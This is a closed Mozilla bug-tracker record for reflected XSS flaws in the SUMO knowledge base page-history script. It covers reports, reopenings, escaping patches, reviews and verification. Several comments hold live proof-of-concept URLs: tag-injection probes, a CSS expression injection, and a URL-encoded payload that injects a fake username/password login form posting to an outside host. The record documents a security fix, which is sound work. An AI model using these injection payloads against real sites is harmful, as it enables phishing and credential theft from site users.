Closed
Bug 463056
(WH-1628180)
Opened 16 years ago
Closed 14 years ago
XSS vulns on tiki-pagehistory.php
Categories
(support.mozilla.org :: Knowledge Base Software, task)
support.mozilla.org
Knowledge Base Software
Tracking
(Not tracked)
VERIFIED
FIXED
1.5.6
People
(Reporter: reed, Assigned: jsocol)
References
()
Details
(Keywords: wsec-xss, Whiteboard: tiki_test [WH-1628180])
Attachments
(2 files, 1 obsolete file)
1.23 KB,
patch
|
ecooper
:
review+
|
Details | Diff | Splinter Review |
21.75 KB,
patch
|
paulc
:
review+
|
Details | Diff | Splinter Review |
Need to be logged-in for some of these to really rear their head. http://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3C?importwhs?%3E http://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3C?importwhs?%3E&source=0 http://support.mozilla.com/tiki-pagehistory.php?page=%3C?importwhs?%3E&preview= http://support.mozilla.com/tiki-pagehistory.php?page=%3C?importwhs?%3E https://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3C?importwhs?%3E
Reporter | ||
Comment 1•16 years ago
|
||
Seems like a dupe of bug 463054 if the fix(es) can be generalized.
Alias: WH-1628180
Updated•16 years ago
|
Assignee: nobody → laura
Target Milestone: --- → 0.7.2
Comment 2•16 years ago
|
||
The fix for bug 463054 fixed this. (Same base sanitization lib). In r19584.
Reporter | ||
Updated•16 years ago
|
Group: websites-security
Reporter | ||
Updated•16 years ago
|
Group: websites-security
Reporter | ||
Comment 3•16 years ago
|
||
Sentinel still shows open vectors: http://support.mozilla.com/tiki-pagehistory.php?page=Personalitzaci%C3%B3+del+Firefox+amb+complements&compare=1&oldver=2&newver=4&diff_style=%22%20STYLE=%22background-image:%20x(a:whs()) http://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3Cwhscheck%3E http://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3Cwhscheck%3E&show_translation_history=1 http://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=%3Cwhscheck%3E&source=1 http://support.mozilla.com/tiki-pagehistory.php?page=%3Cwhscheck%3E https://support.mozilla.com/tiki-pagehistory.php?page=%3Cwhscheck%3E <lots more that I'm tired of copying/pasting>
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Updated•16 years ago
|
Keywords: push-needed
Updated•16 years ago
|
Target Milestone: 0.7.2 → 0.8.1
Comment 4•16 years ago
|
||
Attachment #355582 -
Flags: review?
Updated•16 years ago
|
Attachment #355582 -
Flags: review? → review?(smirkingsisyphus)
Updated•16 years ago
|
Attachment #355582 -
Flags: review?(smirkingsisyphus) → review+
Comment 5•16 years ago
|
||
In trunk r21537 branch r21538.
Status: REOPENED → RESOLVED
Closed: 16 years ago → 16 years ago
Resolution: --- → FIXED
Comment 6•16 years ago
|
||
Ah, ok (talking to myself is a sign of mental collapse, according to Infocom, but here goes): to properly check the URLs in comment 3 for the XSS, you have to login and use https:// schemes, since we've enabled HTTPS. I've since changed the URLs in comment 3 to that on production, and see the page histories (which means I can reproduce the XSS vulns). However, when I change those to use https://support-stage.mozilla.org/..., I get "Error Permission denied you cannot browse this page history" Verified FIXED
Status: RESOLVED → VERIFIED
Updated•15 years ago
|
Whiteboard: tiki_triage
Updated•15 years ago
|
Whiteboard: tiki_triage → tiki_test
Updated•14 years ago
|
Whiteboard: tiki_test → tiki_test [WH-1628180]
Comment 7•14 years ago
|
||
Whitehat discovered this vulnerability to be present again. It looks like we are doing some sanitization of strings (e.g. <script> becomes <sc<x>ript>) but this approach is not effective. I can insert an entire HTML form into the page. We will need to implement a more robust defense performs output encoding on all data accepted via URL arguments and then displayed on the page. Example: Whitehat tag: https://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=Customizing%20Firefox%20with%20add-ons&preview=79%3Cwhscheck%3E Inserts fake login form into page https://support.mozilla.com/tiki-pagehistory.php?locale=en-US&page=Customizing%20Firefox%20with%20add-ons&preview=79%3Cform%20method=%22POST%22%20action=%22https://google.com/%22%3EUsername:%20%3Cinput%20type=%22text%22%20name=%22username%22%20size=%2215%22%20/%3E%3Cbr%20/%3EPassword:%20%3Cinput%20type=%22password%22%20name=%22passwort%22%20size=%2215%22%20/%3E%3Cbr%20/%3E%3Cdiv%20align=%22center%22%3E%3Cp%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/p%3E%3C/div%3E%3C/form%3E
Status: VERIFIED → REOPENED
Resolution: FIXED → ---
Assignee | ||
Updated•14 years ago
|
Assignee: laura → james
Target Milestone: 0.8.1 → 1.5.6
Assignee | ||
Comment 8•14 years ago
|
||
This correctly escapes everything I could in the page history template--I think, let me know if I missed something--and casts a few remaining query string parameters to integers, which is what they're supposed to be. Raise your hand if you will be so, so happy when Smarty and this old, busted security crap will be gone!
Attachment #460261 -
Flags: review?
Comment 9•14 years ago
|
||
/me raises his hand.
Comment 10•14 years ago
|
||
Comment on attachment 460261 [details] [diff] [review] escape and restrict I'm wondering if line #93 (post patch) should be escaped as well, just in case: > 93. {if $info.comment}{$info.comment}{else} {/if} Same for line 151. Otherwise I think it's all good.
Assignee | ||
Comment 11•14 years ago
|
||
(In reply to comment #10) > Comment on attachment 460261 [details] [diff] [review] > escape and restrict > > I'm wondering if line #93 (post patch) should be escaped as well, just in case: > > 93. {if $info.comment}{$info.comment}{else} {/if} > Same for line 151. As far as I can tell, that can include HTML. Though it doesn't seem to, in practice, so I can escape it, too. one sec.
Assignee | ||
Comment 12•14 years ago
|
||
Added escaping on the comments, as well.
Attachment #460261 -
Attachment is obsolete: true
Attachment #460285 -
Flags: review?(paulc)
Attachment #460261 -
Flags: review?
Comment 13•14 years ago
|
||
Comment on attachment 460285 [details] [diff] [review] also escapes the comments Looks good.
Attachment #460285 -
Flags: review?(paulc) → review+
Assignee | ||
Comment 14•14 years ago
|
||
r71376
Status: REOPENED → RESOLVED
Closed: 16 years ago → 14 years ago
Resolution: --- → FIXED
Verified FIXED using: https://support-stage.mozilla.com/tiki-pagehistory.php?locale=en-US&page=Customizing%20Firefox%20with%20add-ons&preview=79%3Cform%20method=%22POST%22%20action=%22https://google.com/%22%3EUsername:%20%3Cinput%20type=%22text%22%20name=%22username%22%20size=%2215%22%20/%3E%3Cbr%20/%3EPassword:%20%3Cinput%20type=%22password%22%20name=%22passwort%22%20size=%2215%22%20/%3E%3Cbr%20/%3E%3Cdiv%20align=%22center%22%3E%3Cp%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/p%3E%3C/div%3E%3C/form%3E Could no longer see the embedded/inserted login form.
Status: RESOLVED → VERIFIED
Comment 16•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Comment 17•8 years ago
|
||
These bugs are all resolved, so I'm removing the security flag from them.
Group: websites-security
You need to log in
before you can comment on or make changes to this bug.
Description
•